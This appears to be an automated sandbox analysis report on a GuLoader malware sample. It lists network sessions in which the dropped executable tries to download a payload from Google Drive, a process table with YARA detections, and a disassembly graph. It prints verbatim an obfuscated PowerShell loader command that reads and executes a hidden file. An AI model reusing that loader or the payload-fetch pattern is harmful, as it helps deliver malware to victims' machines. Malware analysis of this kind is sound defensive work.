                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-2pegk7PAPh3czbgBH2PyyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:43 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 70 58 6d 6a 31 74 5a 78 47 53 56 51 4b 59 30 63 32 64 51 6a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="opXmj1tZxGSVQKY0c2dQjg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      38192.168.2.750007216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:44 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:44 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:44 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-0cJtF1ORZ1ngsZIdzsZINg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      39192.168.2.750008142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:45 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:45 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgSErVEqcdiIYo9SO5Exgcey7DWQfl4gze3x4aZqtQai4FmKic0c3tbf28TPNAM99Vs8W-uvtAk
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:45 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-_bQNRZwhqnKEr4bNaHblDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 35 4c 64 36 62 7a 59 72 6e 79 4c 2d 32 56 6c 6c 62 38 2d 39 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V5Ld6bzYrnyL-2Vllb8-9w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      40192.168.2.750009216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:46 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:46 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:46 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-p-YXX6AA4QTENH1qfFVSZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      41192.168.2.750010142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:47 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:47 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgQpoSdLOOwFCF8-xB6eH5QrKi_F3X152yJCbzpw_xyeDzwmpIoxkbbib5K8mrwvJ6RGSPW81fU
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:47 GMT
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-UssDjWYbp9ezv6iBZMfWuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 65 55 6c 54 6b 48 69 70 73 33 77 42 45 52 6b 69 37 53 42 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_eUlTkHips3wBERki7SBuw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:18:48:42
                                                                                                      Start date:10/01/2025
                                                                                                      Path:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Cpfkf79Rzk.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:859'890 bytes
                                                                                                      MD5 hash:C642619AD2A1AC39867C56CB2F889E78
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:18:48:49
                                                                                                      Start date:10/01/2025
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)"
                                                                                                      Imagebase:0xa80000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2070497812.0000000008D1A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:18:48:49
                                                                                                      Start date:10/01/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:18:49:49
                                                                                                      Start date:10/01/2025
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\Kvababbelser58.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:859'890 bytes
                                                                                                      MD5 hash:C642619AD2A1AC39867C56CB2F889E78
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2638156664.00000000016FA000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 55%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:22.3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:20.8%
                                                                                                        Total number of Nodes:1356
                                                                                                        Total number of Limit Nodes:35
                                                                                                        execution_graph 3167 4015c1 3187 402c41 3167->3187 3171 401631 3173 401663 3171->3173 3174 401636 3171->3174 3176 401423 24 API calls 3173->3176 3203 401423 3174->3203 3185 40165b 3176->3185 3181 40164a SetCurrentDirectoryW 3181->3185 3182 4015d1 3182->3171 3183 401617 GetFileAttributesW 3182->3183 3184 4015fa 3182->3184 3199 405b86 3182->3199 3207 405855 3182->3207 3215 405838 CreateDirectoryW 3182->3215 3183->3182 3184->3182 3210 4057bb CreateDirectoryW 3184->3210 3188 402c4d 3187->3188 3218 4062a6 3188->3218 3191 4015c8 3193 405c04 CharNextW CharNextW 3191->3193 3194 405c21 3193->3194 3197 405c33 3193->3197 3196 405c2e CharNextW 3194->3196 3194->3197 3195 405c57 3195->3182 3196->3195 3197->3195 3198 405b86 CharNextW 3197->3198 3198->3197 3200 405b8c 3199->3200 3201 405ba2 3200->3201 3202 405b93 CharNextW 3200->3202 3201->3182 3202->3200 3256 4052ec 3203->3256 3206 406284 lstrcpynW 3206->3181 3267 40665e GetModuleHandleA 3207->3267 3211 405808 3210->3211 3212 40580c GetLastError 3210->3212 3211->3184 3212->3211 3213 40581b SetFileSecurityW 3212->3213 3213->3211 3214 405831 GetLastError 3213->3214 3214->3211 3216 405848 3215->3216 3217 40584c GetLastError 3215->3217 3216->3182 3217->3216 3234 4062b3 3218->3234 3219 4064fe 3220 402c6e 3219->3220 3251 406284 lstrcpynW 3219->3251 3220->3191 3235 406518 3220->3235 3222 4064cc lstrlenW 3222->3234 3224 4062a6 10 API calls 3224->3222 3227 4063e1 GetSystemDirectoryW 3227->3234 3228 4063f4 GetWindowsDirectoryW 3228->3234 3229 406518 5 API calls 3229->3234 3230 4062a6 10 API calls 3230->3234 3231 40646f lstrcatW 3231->3234 3232 406428 SHGetSpecialFolderLocation 3233 406440 SHGetPathFromIDListW CoTaskMemFree 3232->3233 3232->3234 3233->3234 3234->3219 3234->3222 3234->3224 3234->3227 3234->3228 3234->3229 3234->3230 3234->3231 3234->3232 3244 406152 3234->3244 3249 4061cb wsprintfW 3234->3249 3250 406284 lstrcpynW 3234->3250 3242 406525 3235->3242 3236 4065a0 CharPrevW 3239 40659b 3236->3239 3237 40658e CharNextW 3237->3239 3237->3242 3238 405b86 CharNextW 3238->3242 3239->3236 3240 4065c1 3239->3240 3240->3191 3241 40657a CharNextW 3241->3242 3242->3237 3242->3238 3242->3239 3242->3241 3243 406589 CharNextW 3242->3243 3243->3237 3252 4060f1 3244->3252 3247 4061b6 3247->3234 3248 406186 RegQueryValueExW RegCloseKey 3248->3247 3249->3234 3250->3234 3251->3220 3253 406100 3252->3253 3254 406104 3253->3254 3255 406109 RegOpenKeyExW 3253->3255 3254->3247 3254->3248 3255->3254 3258 405307 3256->3258 3266 401431 3256->3266 3257 405323 lstrlenW 3260 405331 lstrlenW 3257->3260 3261 40534c 3257->3261 3258->3257 3259 4062a6 17 API calls 3258->3259 3259->3257 3262 405343 lstrcatW 3260->3262 3260->3266 3263 405352 SetWindowTextW 3261->3263 3264 40535f 3261->3264 3262->3261 3263->3264 3265 405365 SendMessageW SendMessageW SendMessageW 3264->3265 3264->3266 3265->3266 3266->3206 3268 406684 GetProcAddress 3267->3268 3269 40667a 3267->3269 3270 40585c 3268->3270 3273 4065ee GetSystemDirectoryW 3269->3273 3270->3182 3272 406680 3272->3268 3272->3270 3274 406610 wsprintfW LoadLibraryExW 3273->3274 3274->3272 4061 404a42 4062 404a52 4061->4062 4063 404a6e 4061->4063 4072 4058ce GetDlgItemTextW 4062->4072 4065 404aa1 4063->4065 4066 404a74 SHGetPathFromIDListW 4063->4066 4068 404a8b SendMessageW 4066->4068 4069 404a84 4066->4069 4067 404a5f SendMessageW 4067->4063 4068->4065 4070 40140b 2 API calls 4069->4070 4070->4068 4072->4067 4080 406fc4 4082 406812 4080->4082 4081 40717d 4082->4081 4082->4082 4083 406893 GlobalFree 4082->4083 4084 40689c GlobalAlloc 4082->4084 4085 406913 GlobalAlloc 4082->4085 4086 40690a GlobalFree 4082->4086 4083->4084 4084->4081 4084->4082 4085->4081 4085->4082 4086->4085 4087 401e49 4088 402c1f 17 API calls 4087->4088 4089 401e4f 4088->4089 4090 402c1f 17 API calls 4089->4090 4091 401e5b 4090->4091 4092 401e72 EnableWindow 4091->4092 4093 401e67 ShowWindow 4091->4093 4094 402ac5 4092->4094 4093->4094 4095 40264a 4096 402c1f 17 API calls 4095->4096 4098 402659 4096->4098 4097 402796 4098->4097 4099 4026a3 ReadFile 4098->4099 4100 405dfd ReadFile 4098->4100 4102 4026e3 MultiByteToWideChar 4098->4102 4103 402798 4098->4103 4105 402709 SetFilePointer MultiByteToWideChar 4098->4105 4106 4027a9 4098->4106 4108 405e5b SetFilePointer 4098->4108 4099->4097 4099->4098 4100->4098 4102->4098 4117 4061cb wsprintfW 4103->4117 4105->4098 4106->4097 4107 4027ca SetFilePointer 4106->4107 4107->4097 4109 405e77 4108->4109 4116 405e8f 4108->4116 4110 405dfd ReadFile 4109->4110 4111 405e83 4110->4111 4112 405ec0 SetFilePointer 4111->4112 4113 405e98 SetFilePointer 4111->4113 4111->4116 4112->4116 4113->4112 4114 405ea3 4113->4114 4115 405e2c WriteFile 4114->4115 4115->4116 4116->4098 4117->4097 3505 4014cb 3506 4052ec 24 API calls 3505->3506 3507 4014d2 3506->3507 4125 4016cc 4126 402c41 17 API calls 4125->4126 4127 4016d2 GetFullPathNameW 4126->4127 4130 4016ec 4127->4130 4134 40170e 4127->4134 4128 401723 GetShortPathNameW 4129 402ac5 4128->4129 4131 4065c7 2 API calls 4130->4131 4130->4134 4132 4016fe 4131->4132 4132->4134 4135 406284 lstrcpynW 4132->4135 4134->4128 4134->4129 4135->4134 3591 40234e 3592 402c41 17 API calls 3591->3592 3593 40235d 3592->3593 3594 402c41 17 API calls 3593->3594 3595 402366 3594->3595 3596 402c41 17 API calls 3595->3596 3597 402370 GetPrivateProfileStringW 3596->3597 4136 401b53 4137 402c41 17 API calls 4136->4137 4138 401b5a 4137->4138 4139 402c1f 17 API calls 4138->4139 4140 401b63 wsprintfW 4139->4140 4141 402ac5 4140->4141 4142 401956 4143 402c41 17 API calls 4142->4143 4144 40195d lstrlenW 4143->4144 4145 402592 4144->4145 4146 4014d7 4147 402c1f 17 API calls 4146->4147 4148 4014dd Sleep 4147->4148 4150 402ac5 4148->4150 4151 401f58 4152 402c41 17 API calls 4151->4152 4153 401f5f 4152->4153 4154 4065c7 2 API calls 4153->4154 4155 401f65 4154->4155 4157 401f76 4155->4157 